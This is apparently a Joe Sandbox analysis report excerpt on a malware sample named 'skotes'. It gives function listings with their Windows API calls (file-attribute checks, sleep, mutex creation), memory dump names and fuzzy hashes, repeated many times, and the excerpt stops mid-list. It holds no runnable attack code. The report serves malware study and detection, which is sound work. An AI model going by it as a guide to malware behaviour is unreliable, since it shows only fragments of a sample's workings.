Opcode Fuzzy Hash: 6d25b435feef74c788f9b7dd8286491e51eac0140fe8947bd9fbd1f13e007bed
Instruction Fuzzy Hash: A3314A717102849BEB18DB79DCC976DB7EAEFC6310F204298E114A73D2D775A9848713

Function 00BEA2E3 Relevance: 4.6, APIs: 3, Instructions: 134
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesA.KERNELBASE(00000000), ref: 00BEA2E6
Sleep.KERNELBASE(00000064,?), ref: 00BEA963
CreateMutexA.KERNELBASE(00000000,00000000,00C43254), ref: 00BEA981

Memory Dump Source

Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: AttributesCreateFileMutexSleep
String ID:
API String ID: 396266464-0
Opcode ID: c3eadf62c03d30c9ddcee24837d4fb7c872c061a397b0549922329e79e7f2bd5
Instruction ID: 5f066d08b12c58de7d5f64e8cf0d398773e0f35c831c18bd1c88f89ae624a7d7
Opcode Fuzzy Hash: c3eadf62c03d30c9ddcee24837d4fb7c872c061a397b0549922329e79e7f2bd5
Instruction Fuzzy Hash: 68316A717102849BEB18DB79DCC876DB7FAEFC6310F208298E014AB7D6C775A9848716

Function 00BEA418 Relevance: 4.6, APIs: 3, Instructions: 133
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesA.KERNELBASE(00000000), ref: 00BEA41B
Sleep.KERNELBASE(00000064,?), ref: 00BEA963
CreateMutexA.KERNELBASE(00000000,00000000,00C43254), ref: 00BEA981

Memory Dump Source

Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: AttributesCreateFileMutexSleep
String ID:
API String ID: 396266464-0
Opcode ID: 8c658ed2615dc307b92748b1d9f60f6570a45923d23825c45d102c0f1049ddc7
Instruction ID: a028a6b9d8726b318ac079cc72f73d7ba378575658e3ff5e8f460169aa19792e
Opcode Fuzzy Hash: 8c658ed2615dc307b92748b1d9f60f6570a45923d23825c45d102c0f1049ddc7
Instruction Fuzzy Hash: 153159317001849BEB18EB79D8CDB6DB7FAEFC2310F204298E0149B3C6D7B569848752

Function 00BEA54D Relevance: 4.6, APIs: 3, Instructions: 132sleepsynchronizationCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(00000000), ref: 00BEA550
Sleep.KERNELBASE(00000064,?), ref: 00BEA963
CreateMutexA.KERNELBASE(00000000,00000000,00C43254), ref: 00BEA981

Memory Dump Source

Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: AttributesCreateFileMutexSleep
String ID:
API String ID: 396266464-0
Opcode ID: e9933351f5afe4f24ac8f8008c6a5b367e5c2d6206084772a060a0c35b431598
Instruction ID: de6a704a8c39ecb45905020e25845e10db435e85ae865ab63201ff7fbf34c392
Opcode Fuzzy Hash: e9933351f5afe4f24ac8f8008c6a5b367e5c2d6206084772a060a0c35b431598
Instruction Fuzzy Hash: 9D317B317101849BEB18DB79CCC9B6DB7EAEFC6314F248298E014DB3D2C775A9848712

Function 00BEA682 Relevance: 4.6, APIs: 3, Instructions: 131sleepsynchronizationCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(00000000), ref: 00BEA685
Sleep.KERNELBASE(00000064,?), ref: 00BEA963
CreateMutexA.KERNELBASE(00000000,00000000,00C43254), ref: 00BEA981

Memory Dump Source

Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: AttributesCreateFileMutexSleep
String ID:
API String ID: 396266464-0
Opcode ID: fa88eb73975ab1dea56f842beca1569efb7c8bd32c4566a1ba71c7776ad09af2
Instruction ID: 1f5d7cf5f4891cf68450d41cac514abea9ef71f5eb3e92dac8c08fa3e37dcc8c
Opcode Fuzzy Hash: fa88eb73975ab1dea56f842beca1569efb7c8bd32c4566a1ba71c7776ad09af2
Instruction Fuzzy Hash: F6314A717102849BEB18DB79DCC976DB7EAEFC6310F248298E014DB3D2C775A9848752

Function 00BEA7B7 Relevance: 4.6, APIs: 3, Instructions: 130sleepsynchronizationCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(00000000), ref: 00BEA7BA
Sleep.KERNELBASE(00000064,?), ref: 00BEA963
CreateMutexA.KERNELBASE(00000000,00000000,00C43254), ref: 00BEA981

Memory Dump Source

Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: AttributesCreateFileMutexSleep
String ID:
API String ID: 396266464-0
Opcode ID: 89529149afc7099fe8e2a9db4a5042ac5e890afe8e7cd94cbc3d333ae1a6a383
Instruction ID: cf82cee474989ff8bafdd521f4eff2edffd99701a091829b992bb07eed23884e
Opcode Fuzzy Hash: 89529149afc7099fe8e2a9db4a5042ac5e890afe8e7cd94cbc3d333ae1a6a383
Instruction Fuzzy Hash: 59314A71B00184DBEB18DB79CDC9B6DBBEAEFC6310F204298E014972D2D775A9858712

Function 00BEA960 Relevance: 3.0, APIs: 2, Instructions: 43sleepsynchronizationCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00000064,?), ref: 00BEA963
CreateMutexA.KERNELBASE(00000000,00000000,00C43254), ref: 00BEA981

Memory Dump Source

Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
